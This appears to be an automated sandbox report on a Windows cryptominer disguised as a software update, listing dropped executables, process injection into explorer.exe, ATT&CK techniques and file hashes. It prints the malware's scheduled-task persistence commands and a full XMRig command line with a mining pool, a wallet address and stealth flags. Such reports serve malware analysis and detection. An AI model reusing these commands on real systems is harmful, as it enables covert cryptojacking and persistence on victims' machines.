xmrig | b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae

Analysis

max time kernel
137s
max time network
147s
platform
windows10_x64
resource
win10v20210408
submitted
19-07-2021 10:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Software updated v2.6.0(1).exe
Size

256KB
MD5

18d05e20731583a22b495d0d1f107c5b
SHA1

2ced0e3577063ca3613b43661e7df5bc1411ab09
SHA256

b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae
SHA512

36e73454b0d74088fb39dbec77c45c4106908dc80efc6a0ac8247a538345b4224f3f5e0cf6b39cf8c1687ddcee58ac2e6f24b735c9b9e277c7d064fd82e7a65a

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3112-166-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/3112-167-0x00000001402EB66C-mapping.dmp	xmrig
behavioral2/memory/3112-169-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Executes dropped EXE 6 IoCs

Processes:

xmrmine.exeetcmin.exertksmbs.exeserverpatch.exesihost32.exesihost64.exe

pid process

3172 xmrmine.exe
1676 etcmin.exe
3872 rtksmbs.exe
2368 serverpatch.exe
1292 sihost32.exe
2732 sihost64.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

serverpatch.exe

description pid process target process

PID 2368 set thread context of 3112 2368 serverpatch.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3240 schtasks.exe
3508 schtasks.exe
3944 schtasks.exe
748 schtasks.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

etcmin.exexmrmine.exertksmbs.exeserverpatch.exe

pid process

1676 etcmin.exe
3172 xmrmine.exe
3872 rtksmbs.exe
2368 serverpatch.exe

pid	process
3172	xmrmine.exe
1676	etcmin.exe
3872	rtksmbs.exe
2368	serverpatch.exe
1292	sihost32.exe
2732	sihost64.exe

description	pid	process	target process
PID 2368 set thread context of 3112	2368	serverpatch.exe	explorer.exe

pid	process
3240	schtasks.exe
3508	schtasks.exe
3944	schtasks.exe
748	schtasks.exe

pid	process
1676	etcmin.exe
3172	xmrmine.exe
3872	rtksmbs.exe
2368	serverpatch.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

etcmin.exexmrmine.exertksmbs.exeserverpatch.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	1676	etcmin.exe
Token: SeDebugPrivilege	3172	xmrmine.exe
Token: SeDebugPrivilege	3872	rtksmbs.exe
Token: SeDebugPrivilege	2368	serverpatch.exe
Token: SeLockMemoryPrivilege	3112	explorer.exe
Token: SeLockMemoryPrivilege	3112	explorer.exe

Suspicious use of WriteProcessMemory 43 IoCs

Processes:

Software updated v2.6.0(1).exexmrmine.exeetcmin.execmd.execmd.exeserverpatch.exertksmbs.execmd.execmd.exe

description	pid	process	target process
PID 656 wrote to memory of 3172	656	Software updated v2.6.0(1).exe	xmrmine.exe
PID 656 wrote to memory of 3172	656	Software updated v2.6.0(1).exe	xmrmine.exe
PID 656 wrote to memory of 1676	656	Software updated v2.6.0(1).exe	etcmin.exe
PID 656 wrote to memory of 1676	656	Software updated v2.6.0(1).exe	etcmin.exe
PID 3172 wrote to memory of 3112	3172	xmrmine.exe	cmd.exe
PID 3172 wrote to memory of 3112	3172	xmrmine.exe	cmd.exe
PID 1676 wrote to memory of 1212	1676	etcmin.exe	cmd.exe
PID 1676 wrote to memory of 1212	1676	etcmin.exe	cmd.exe
PID 1212 wrote to memory of 748	1212	cmd.exe	schtasks.exe
PID 1212 wrote to memory of 748	1212	cmd.exe	schtasks.exe
PID 3112 wrote to memory of 3944	3112	cmd.exe	schtasks.exe
PID 3112 wrote to memory of 3944	3112	cmd.exe	schtasks.exe
PID 1676 wrote to memory of 3872	1676	etcmin.exe	rtksmbs.exe
PID 1676 wrote to memory of 3872	1676	etcmin.exe	rtksmbs.exe
PID 3172 wrote to memory of 2368	3172	xmrmine.exe	serverpatch.exe
PID 3172 wrote to memory of 2368	3172	xmrmine.exe	serverpatch.exe
PID 2368 wrote to memory of 3912	2368	serverpatch.exe	cmd.exe
PID 2368 wrote to memory of 3912	2368	serverpatch.exe	cmd.exe
PID 3872 wrote to memory of 3496	3872	rtksmbs.exe	cmd.exe
PID 3872 wrote to memory of 3496	3872	rtksmbs.exe	cmd.exe
PID 2368 wrote to memory of 2732	2368	serverpatch.exe	sihost64.exe
PID 2368 wrote to memory of 2732	2368	serverpatch.exe	sihost64.exe
PID 3872 wrote to memory of 1292	3872	rtksmbs.exe	sihost32.exe
PID 3872 wrote to memory of 1292	3872	rtksmbs.exe	sihost32.exe
PID 3496 wrote to memory of 3240	3496	cmd.exe	schtasks.exe
PID 3496 wrote to memory of 3240	3496	cmd.exe	schtasks.exe
PID 3912 wrote to memory of 3508	3912	cmd.exe	schtasks.exe
PID 3912 wrote to memory of 3508	3912	cmd.exe	schtasks.exe
PID 2368 wrote to memory of 3112	2368	serverpatch.exe	explorer.exe
PID 2368 wrote to memory of 3112	2368	serverpatch.exe	explorer.exe
PID 2368 wrote to memory of 3112	2368	serverpatch.exe	explorer.exe
PID 2368 wrote to memory of 3112	2368	serverpatch.exe	explorer.exe
PID 2368 wrote to memory of 3112	2368	serverpatch.exe	explorer.exe
PID 2368 wrote to memory of 3112	2368	serverpatch.exe	explorer.exe
PID 2368 wrote to memory of 3112	2368	serverpatch.exe	explorer.exe
PID 2368 wrote to memory of 3112	2368	serverpatch.exe	explorer.exe
PID 2368 wrote to memory of 3112	2368	serverpatch.exe	explorer.exe
PID 2368 wrote to memory of 3112	2368	serverpatch.exe	explorer.exe
PID 2368 wrote to memory of 3112	2368	serverpatch.exe	explorer.exe
PID 2368 wrote to memory of 3112	2368	serverpatch.exe	explorer.exe
PID 2368 wrote to memory of 3112	2368	serverpatch.exe	explorer.exe
PID 2368 wrote to memory of 3112	2368	serverpatch.exe	explorer.exe
PID 2368 wrote to memory of 3112	2368	serverpatch.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0(1).exe
"C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0(1).exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:656

C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\xmrmine.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3172

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:3112

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
4⤵
- Creates scheduled task(s)
PID:3944

C:\Users\Admin\appdata\roaming\serverpatch.exe
"C:\Users\Admin\appdata\roaming\serverpatch.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2368

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:3912

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
5⤵
- Creates scheduled task(s)
PID:3508

C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
"C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"
4⤵
- Executes dropped EXE
PID:2732

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3112

C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1212

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
4⤵
- Creates scheduled task(s)
PID:748

C:\Users\Admin\appdata\roaming\rtksmbs.exe
"C:\Users\Admin\appdata\roaming\rtksmbs.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3872

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:3496

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
5⤵
- Creates scheduled task(s)
PID:3240

C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
"C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"
4⤵
- Executes dropped EXE
PID:1292

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exe
MD5
f20a5085dbb85927b25ed46a45fe0a13

SHA1
41b351e45a7be1d6c6c6918ee65b00f5d69ff787

SHA256
370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235

SHA512
4cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exe
MD5
e149663730c0b03c8936baffe9645bb4

SHA1
c0fb146c35d48481df4149027953e4ab7be59e95

SHA256
33225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469

SHA512
553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe

Download Submit
C:\Users\Admin\AppData\Roaming\etcmin.exe
MD5
406f2550d0d4b9b3e2f47994076e8b8b

SHA1
01ab414c9d14ef6a10cd1f3c815e2d63ace18822

SHA256
4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

SHA512
73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

Download Submit
C:\Users\Admin\AppData\Roaming\etcmin.exe
MD5
406f2550d0d4b9b3e2f47994076e8b8b

SHA1
01ab414c9d14ef6a10cd1f3c815e2d63ace18822

SHA256
4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

SHA512
73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

Download Submit
C:\Users\Admin\AppData\Roaming\rtksmbs.exe
MD5
406f2550d0d4b9b3e2f47994076e8b8b

SHA1
01ab414c9d14ef6a10cd1f3c815e2d63ace18822

SHA256
4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

SHA512
73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

Download Submit
C:\Users\Admin\AppData\Roaming\serverpatch.exe
MD5
973037113a1f50e0ca79d3cc42a5ef66

SHA1
78235c164ebfa47d613a100abf5c64bed10c1036

SHA256
a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

SHA512
d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

Download Submit
C:\Users\Admin\AppData\Roaming\xmrmine.exe
MD5
973037113a1f50e0ca79d3cc42a5ef66

SHA1
78235c164ebfa47d613a100abf5c64bed10c1036

SHA256
a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

SHA512
d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

Download Submit
C:\Users\Admin\AppData\Roaming\xmrmine.exe
MD5
973037113a1f50e0ca79d3cc42a5ef66

SHA1
78235c164ebfa47d613a100abf5c64bed10c1036

SHA256
a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

SHA512
d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

Download Submit
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
MD5
f20a5085dbb85927b25ed46a45fe0a13

SHA1
41b351e45a7be1d6c6c6918ee65b00f5d69ff787

SHA256
370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235

SHA512
4cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f

Download Submit
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
MD5
e149663730c0b03c8936baffe9645bb4

SHA1
c0fb146c35d48481df4149027953e4ab7be59e95

SHA256
33225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469

SHA512
553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe

Download Submit
C:\Users\Admin\appdata\roaming\rtksmbs.exe
MD5
406f2550d0d4b9b3e2f47994076e8b8b

SHA1
01ab414c9d14ef6a10cd1f3c815e2d63ace18822

SHA256
4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

SHA512
73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

Download Submit
C:\Users\Admin\appdata\roaming\serverpatch.exe
MD5
973037113a1f50e0ca79d3cc42a5ef66

SHA1
78235c164ebfa47d613a100abf5c64bed10c1036

SHA256
a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

SHA512
d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

Download Submit
memory/748-130-0x0000000000000000-mapping.dmp

Download
memory/1212-129-0x0000000000000000-mapping.dmp

Download
memory/1292-161-0x000000001C4C0000-0x000000001C4C2000-memory.dmp

Filesize
8KB

Download
memory/1292-156-0x00000000008C0000-0x00000000008C1000-memory.dmp

Filesize
4KB

Download
memory/1292-151-0x0000000000000000-mapping.dmp

Download
memory/1676-132-0x000000001D280000-0x000000001D282000-memory.dmp

Filesize
8KB

Download
memory/1676-117-0x0000000000000000-mapping.dmp

Download
memory/1676-121-0x0000000000ED0000-0x0000000000ED1000-memory.dmp

Filesize
4KB

Download
memory/1676-125-0x0000000003420000-0x0000000003426000-memory.dmp

Filesize
24KB

Download
memory/2368-135-0x0000000000000000-mapping.dmp

Download
memory/2368-162-0x000000001C9C0000-0x000000001C9C2000-memory.dmp

Filesize
8KB

Download
memory/2732-157-0x0000000000EE0000-0x0000000000EE1000-memory.dmp

Filesize
4KB

Download
memory/2732-163-0x000000001C970000-0x000000001C972000-memory.dmp

Filesize
8KB

Download
memory/2732-150-0x0000000000000000-mapping.dmp

Download
memory/3112-167-0x00000001402EB66C-mapping.dmp

Download
memory/3112-168-0x00000000009E0000-0x0000000000A00000-memory.dmp

Filesize
128KB

Download
memory/3112-169-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/3112-166-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/3112-172-0x0000000002810000-0x0000000002830000-memory.dmp

Filesize
128KB

Download
memory/3112-173-0x0000000002830000-0x0000000002850000-memory.dmp

Filesize
128KB

Download
memory/3112-128-0x0000000000000000-mapping.dmp

Download
memory/3112-175-0x00000000028E0000-0x0000000002900000-memory.dmp

Filesize
128KB

Download
memory/3112-174-0x0000000002830000-0x0000000002850000-memory.dmp

Filesize
128KB

Download
memory/3172-124-0x00000000012B0000-0x00000000012B9000-memory.dmp

Filesize
36KB

Download
memory/3172-120-0x0000000000A80000-0x0000000000A81000-memory.dmp

Filesize
4KB

Download
memory/3172-127-0x0000000001590000-0x0000000001591000-memory.dmp

Filesize
4KB

Download
memory/3172-114-0x0000000000000000-mapping.dmp

Download
memory/3172-133-0x000000001CE50000-0x000000001CE52000-memory.dmp

Filesize
8KB

Download
memory/3240-164-0x0000000000000000-mapping.dmp

Download
memory/3496-149-0x0000000000000000-mapping.dmp

Download
memory/3508-165-0x0000000000000000-mapping.dmp

Download
memory/3872-160-0x0000000000AE0000-0x0000000000AE2000-memory.dmp

Filesize
8KB

Download
memory/3872-134-0x0000000000000000-mapping.dmp

Download
memory/3912-148-0x0000000000000000-mapping.dmp

Download
memory/3944-131-0x0000000000000000-mapping.dmp

Download